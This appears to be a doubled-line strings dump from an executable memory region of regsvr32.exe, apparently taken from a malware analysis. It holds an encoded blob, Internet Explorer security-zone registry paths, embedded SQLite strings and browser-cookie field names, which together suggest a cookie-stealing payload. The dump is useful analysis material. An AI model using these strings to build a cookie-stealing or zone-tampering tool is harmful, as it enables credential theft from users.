N0l9jtdDeqcVIT7UnPxNobPutRirxsSJ2ykiPosbCuSmGJ2luJnNB2f544LQeD6Ywu5gBT7NC0CmN0zdiF//uq1mIzekizAnyOUYWpRppij5I9dhei3EuFxJKPvu9NohC121dVsh5GLiNcJ2rv2cLEjUiCN0mWy5nFaDe9yEG6Q4LUEw3h3spbcwkKgq3InOIXH5xyQL9R8ycznUoXgaMzAr/ISItqIw9JINdKxGL1 qjfEem6MYgVVsr/8choKvCW3007EyRqptoTDlADiu91orLcl0PbNb7BwNmfZYMYrAImr/ByyAPFLZO87xv/oBB pPVyNCJs p1FNOzmfv5NFa1bvC4f37nMbd9Udx/OikdZavj1wdDGzMX6oViwK VhwR r12DcYln6G6K0FiXQ7tHi5yP9RVPmiN76S1Vy2nlwA iOB3Pn9dU98LHhqob7bNx2VH7r 236DG4JEQj2rNOyrvDHeBZILrP8gpgQsyXAK/vkBtS6zefT5U985ibWtURWUNfHZ7CKJTgnao30Yvix7ONG9X55dsRcEJsMjn79ri1ggH4W1QbM5WFZMBPGSQDmCo6BJVEA0zw/H8OzA94G/meiuKtFGBET2kEJBXkiJ/Nj45RwF7GioMHDh2nVKeM9RtLi6QkyJY2F5p6JgfdOCy7Vb0zpCLzR/gTcI/SBE9fJEe2RdzbBEkIiIq/e5XXzdy5VE264JbYDhVUzkYqT5m5RvpQ1WaoYNLOogRS9kKjsthNMNbpWOOQIkjLaVTReY/CY S7dhLpEDz0n8gwdM2U/R8nu lECUYqEY2N5p3IRtfbkQ9BtlwlQBIFOblFccd1kks7s/p1tH9FyODzisTiaABwyIHBYjwJzod99fLPtGtDZ7wcJ 1TEaSyCWhxPcVqtsARsxgh8oGIM6Xyf9znVVg1pA4Ls5zfs/DfcZ7hLlvE6nzJh22z/9mdImznshhlPfIfcQ2rF97V9mikNxuGTNrfqHPJZPeBpwxJV5C918ybmhlPrOMKMJJmJKxJaM1i lyVp78eTRLF72u3n y3dEq5vOTbnCXE4gE61szPbjUc0NMmtPxnVrhoOajBwJyk7ozqJbZgxLPzF1gH0DvcrYPeUs/uFzXDlXwa/qB6C08bQDsH50J6UqQV67oX8HY4h28v49y7cUWUYt3Mcy8NznHD4clKGtsQJPldyCkekfi/tch9lmECxVI197U/93trIQrhvZKJtY c/pZlRliwqVhofXEh6c GUXPX1LEmI6YdIyElqCybGJFGlXYOTqNm3O4kuiUxZqPSmKBJ6QWuFIaJzSyZl Jg6uvi9mooC6CdqR Sx/PpLqV5cD7gnw66FcLDxTKXnvGFig9K/EVh cmYE/SWPl4i C2WAtSKZol6vKAbpi0JDfpAwb9eAx60GySErBYDPFQ9hV3OljxOyq9UBEM7OJk5Aot0tIA1CGT/TCL/Vw1eo6OBnKsvR2JwX5jtOhDXdZhbnLwIkjd8RNGb5Or93MOW7B2hKPfdUco6zV0CD GBCjois1LL6loZ33mdpD8QLjmSEjX0/DL iWQ9IThcbkpRV Z7qGXywNr4r4/WCNuOhUdugAlxgkLBloP2ipBDB7QYyEtUGgH0RAmE9n9dAqB6knCSFBq3L6G2EEv4CWMS6DrR8HgXt1rr10mz9JtQ2PQarG7zMxWyQG21w9uyT7EVBX0nir8Em95NT7X8HStIfGYMPIJ7xRUHkdxTx1pjFxzQWOVJcvKa5w5gpA1Xov1wrHpdWD8VCTFAkBfv6EfxUVSGGb OLa MIsuuFY/WMhOOjwsujPMZPJFSW2Y7j2SkgtkTZ1FeXEraT6BPM7U zzi5szN0vXyzFMvIo5Uu3QUtJltqCVCohBgY7/cZ4po1gxL/va0HsYcxv6YwPJJq231t4rXLJ4hEOJTz6mvJMMrKz YdO2V/8UuI/pTD9KAcgsxdDp3oZfJbpfx6IsM7eT4F4LNHw695TSM/EgyiIV581yI4nPHNJfxYJ3aXrKI/3oIfmjG5gTZoe2McS7IyDT73KBBL wXfPBKnSRgaxj K0wDIqHpjJaK27UUZG3flQM8RX4q6hgjJQAqMhZIVJC0Z 7Dqg W9gui9 BPwTi Bqco9TXX1ju293YfVWajIe0 8BnvnmJTS7gXqFAa1mfLcZdM5cNsSj9nMiIS2FHcOHeeP2JHy5f6msa9r8wDpSmetJ1Guhf/C2rJjqA1EiQOJR4KXy2JsQtn7ahmRbDcY G6YukhUP0gjCjRqtEU8rs2S4RcsoHfAdO3UQGzwcST73Hohg6n6bH5Cu4obOlXvg0rdvbOw c6cCdEDHeWh0CwfWaSI/SslwL70DERLEDhjXDKdOxSgGBeryK0W75m2KDjcseqV9wxpZADM2II2XjrMCEMtQk29iUS9b7S2FBU0ncF3XHjttNqI5R2UimjOo57C2ESUqn3wK/uP490uI0 7Knr4OD5qc95H8/8eJz7CuIEx882f9Yd6goaCtChnBv8rzwUeH86vGTG4bmRKOX5H9ztPQHDO3hox1rmLXrgZTotKRmtyAS7MrB0pjZdQxu3vRyEsyLDy2YBQv5/y6ZSlRTI6oOhJO2C4c0pkOfdLrvRwAm2nHagci47ExA5k0xvoqK8mXydCQkOZGRJHon9SYqoVthUvfRwAxWXA6zllWTNb 8W8aXHc8YGcqpAQxuzLvTQZwW8C3/N DKFK3YyXVo54wu/Oo/LtmaZ0OVNKovH4LoOJSyLuqOmF4da2wdbd77pp2r5XYBc ri7Zsv6i makju6nos7WqQ/Fo9hG2tQGHoHz6srqQ7B0L3IKlvePezzzcwvn6qQE4Z5 yiNA wRJjVJSrGVBploFCMCA7VJYsAOUIr3FkxwmWYd K7d4f8ara5D20P2vzQoSY//YOLNyQWbRdcmie/jm8 tkLoO9qkJ Si4Q/rhOb229XRmnZmkv87KPDRLK5P5Kdl 1Gh0f7yRCGMQWlAnzmIzSWl6ufjKsy4OHw Ibg4fapFDoByZKKUxMyFFp1o2SuA/H6O5bu0GRvqoVpCNbSMRqVB7cRO8wM0/emO7ftHvENtuW9oujk85 Jjhu0zrH6iEIVxZm9cojZMHUd2B WJfdOdPhNO710 x2l8hXOaqLDguLjZsgHlYR0M6IxlfJvivhj5MHOTRT1y4uxyTTlYgZFGyMXDgAKB2jXI3Cty0vZUTp5Q9PNpbLSoZGc/zw4/TpKWXyzfAHlkkibwotw2OYzUOgtbggg4jpmlBoT2JOao1ctkr2d3UBmAy8XpvspvnBX/xvpdRL/1QMys=lRCPASX27nuqqN0rPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
66006666
regsvr32.exe_3264_rwx_009B0000_0006C000:
t8It.IIt#
t8It.IIt#
.FGyO
.FGyO
FTPj
FTPj
YPSSSh
YPSSSh
9t$Lt.VV
9t$Lt.VV
,4,56,789
,4,56,789
GetProcessWindowStation
GetProcessWindowStation
3.7.13
3.7.13
SQLite format 3
SQLite format 3
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY\
-cmd command run "command" before reading stdin
-cmd command run "command" before reading stdin
-echo print commands before execution
-echo print commands before execution
-version show SQLite version
-version show SQLite version
%a, %d-%b-%Y %H:%M:%S GMT
%a, %d-%b-%Y %H:%M:%S GMT
isHttpOnly
isHttpOnly
HttpOnly=YES
HttpOnly=YES
HttpOnly=NO
HttpOnly=NO
SQLITE_
SQLITE_
d-d-d d:d:d
d-d-d d:d:d
d:d:d
d:d:d
d-d-d
d-d-d
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
922337203685477580
922337203685477580
API call with %s database connection pointer
API call with %s database connection pointer
RowKey
RowKey
GetProcessHeap
GetProcessHeap
OsError 0x%x (%u)
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
delayed %dms for lock/sharing conflict
%s-shm
%s-shm
%s\etilqs_
%s\etilqs_
%s\%s
%s\%s
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
cannot limit WAL size: %s
invalid page number %d
invalid page number %d
2nd reference to page %d
2nd reference to page %d
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
failed to get page %d
failed to get page %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
Page %d:
Page %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On tree page %d cell %d:
On page %d at right child:
On page %d at right child:
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Pointer map page %d is referenced
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
unknown database %s
unknown database %s
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
MJ delete: %s
MJ delete: %s
MJ collide: %s
MJ collide: %s
-mjX9X
-mjX9X
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
abort at %d in [%s]: %s
abort at %d in [%s]: %s
constraint failed at %d in [%s]
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
sqlite_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
database table is locked: %s
database table is locked: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open value of type %s
cannot open virtual table: %s
cannot open virtual table: %s
cannot open view: %s
cannot open view: %s
no such column: "%s"
no such column: "%s"
foreign key
foreign key
indexed
indexed
cannot open %s column for writing
cannot open %s column for writing
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s.%s
%s: %s.%s
%s: %s
%s: %s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many SQL variables
too many SQL variables
too many columns in %s
too many columns in %s
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
misuse of aggregate: %s()
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_parent
sqlite_rename_parent
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
sqlite_
sqlite_
table %s may not be altered
table %s may not be altered
there is already another table or index with this name: %s
there is already another table or index with this name: %s
view %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
sqlite_sequence
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_altertab_%s
sqlite_stat1
sqlite_stat1
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
invalid name: "%s"
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
unable to open database: %s
unable to open database: %s
no such database: %s
no such database: %s
cannot detach database %s
cannot detach database %s
database %s is locked
database %s is locked
sqlite_detach
sqlite_detach
sqlite_attach
sqlite_attach
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
too many columns on %s
too many columns on %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
table "%s" has more than one primary key
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
no such collation sequence: %s
CREATE %s %.*s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat
table %s may not be dropped
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
views may not be indexed
views may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
there is already a table named %s
there is already a table named %s
index %s already exists
index %s already exists
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
table %s has no column named %s
table %s has no column named %s
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
table %s may not be modified
table %s may not be modified
cannot modify %s because it is a view
cannot modify %s because it is a view
sqlite_version
sqlite_version
sqlite_source_id
sqlite_source_id
sqlite_log
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_compileoption_get
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
%d values for %d columns
%d values for %d columns
table %S has no column named %s
table %S has no column named %s
%s.%s may not be NULL
%s.%s may not be NULL
constraint %s failed
constraint %s failed
PRIMARY KEY must be unique
PRIMARY KEY must be unique
sqlite3_extension_init
sqlite3_extension_init
unable to open shared library [%s]
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
error during initialization: %s
automatic extension loading failed: %s
automatic extension loading failed: %s
foreign_keys
foreign_keys
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
unsupported file format
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s.%s
%s:%d
%s:%d
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
no such table: %s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
no such trigger: %S
-- TRIGGER %s
-- TRIGGER %s
no such column: %s
no such column: %s
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s SUBQUERY %d
%s TABLE %s
%s TABLE %s
%s AS %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid>?)
%s (rowid)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
%s (~%lld rows)
at most %d tables in a join
at most %d tables in a join
cannot use index: %s
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unable to close due to unfinished backup operation
SQL logic error or missing database
SQL logic error or missing database
unknown operation
unknown operation
large file support is disabled
large file support is disabled
unknown database: %s
unknown database: %s
no such %s mode: %s
no such %s mode: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such vfs: %s
no such vfs: %s
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
CPU Time: user %f sys %f
CPU Time: user %f sys %f
(%d) %s
(%d) %s
%*s = %s
%*s = %s
%-*.*s%s
%-*.*s%s
INSERT INTO %s VALUES(
INSERT INTO %s VALUES(
%sNULL
%sNULL
/**** ERROR: (%d) %s *****/
/**** ERROR: (%d) %s *****/
Memory Used: %d (max %d) bytes
Memory Used: %d (max %d) bytes
Number of Outstanding Allocations: %d (max %d)
Number of Outstanding Allocations: %d (max %d)
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Pcache Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Number of Scratch Overflow Bytes: %d (max %d) bytes
Largest Allocation: %d bytes
Largest Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Pcache Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Largest Scratch Allocation: %d bytes
Lookaside Slots Used: %d (max %d)
Lookaside Slots Used: %d (max %d)
Successful lookaside attempts: %d
Successful lookaside attempts: %d
Lookaside failures due to size: %d
Lookaside failures due to size: %d
Lookaside failures due to OOM: %d
Lookaside failures due to OOM: %d
Pager Heap Usage: %d bytes
Pager Heap Usage: %d bytes
Page cache hits: %d
Page cache hits: %d
Page cache misses: %d
Page cache misses: %d
Page cache writes: %d
Page cache writes: %d
Schema Heap Usage: %d bytes
Schema Heap Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Statement Heap/Lookaside Usage: %d bytes
Fullscan Steps: %d
Fullscan Steps: %d
Sort Operations: %d
Sort Operations: %d
Autoindex Inserts: %d
Autoindex Inserts: %d
DELETE FROM sqlite_sequence;
DELETE FROM sqlite_sequence;
ANALYZE sqlite_master;
ANALYZE sqlite_master;
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
INSERT INTO sqlite_master(type,name,tbl_name,rootpage,sql)VALUES('table','%q','%q',0,'%q');
/****** %s ******/
/****** %s ******/
%s ORDER BY rowid DESC
%s ORDER BY rowid DESC
/****** ERROR: %s ******/
/****** ERROR: %s ******/
.backup ?DB? FILE Backup DB (default "main") to FILE
.backup ?DB? FILE Backup DB (default "main") to FILE
.bail ON|OFF Stop after hitting an error. Default OFF
.bail ON|OFF Stop after hitting an error. Default OFF
.databases List names and files of attached databases
.databases List names and files of attached databases
.dump ?TABLE? ... Dump the database in an SQL text format
.dump ?TABLE? ... Dump the database in an SQL text format
.echo ON|OFF Turn command echo on or off
.echo ON|OFF Turn command echo on or off
.exit Exit this program
.exit Exit this program
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.explain ?ON|OFF? Turn output mode suitable for EXPLAIN on or off.
.header(s) ON|OFF Turn display of headers on or off
.header(s) ON|OFF Turn display of headers on or off
.help Show this message
.help Show this message
.import FILE TABLE Import data from FILE into TABLE
.import FILE TABLE Import data from FILE into TABLE
.indices ?TABLE? Show names of all indices
.indices ?TABLE? Show names of all indices
.load FILE ?ENTRY? Load an extension library
.load FILE ?ENTRY? Load an extension library
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.log FILE|off Turn logging on or off. FILE can be stderr/stdout
.mode MODE ?TABLE? Set output mode where MODE is one of:
.mode MODE ?TABLE? Set output mode where MODE is one of:
column Left-aligned columns. (See .width)
column Left-aligned columns. (See .width)
insert SQL insert statements for TABLE
insert SQL insert statements for TABLE
list Values delimited by .separator string
list Values delimited by .separator string
.nullvalue STRING Print STRING in place of NULL values
.nullvalue STRING Print STRING in place of NULL values
.output FILENAME Send output to FILENAME
.output FILENAME Send output to FILENAME
.output stdout Send output to the screen
.output stdout Send output to the screen
.prompt MAIN CONTINUE Replace the standard prompts
.prompt MAIN CONTINUE Replace the standard prompts
.quit Exit this program
.quit Exit this program
.read FILENAME Execute SQL in FILENAME
.read FILENAME Execute SQL in FILENAME
.restore ?DB? FILE Restore content of DB (default "main") from FILE
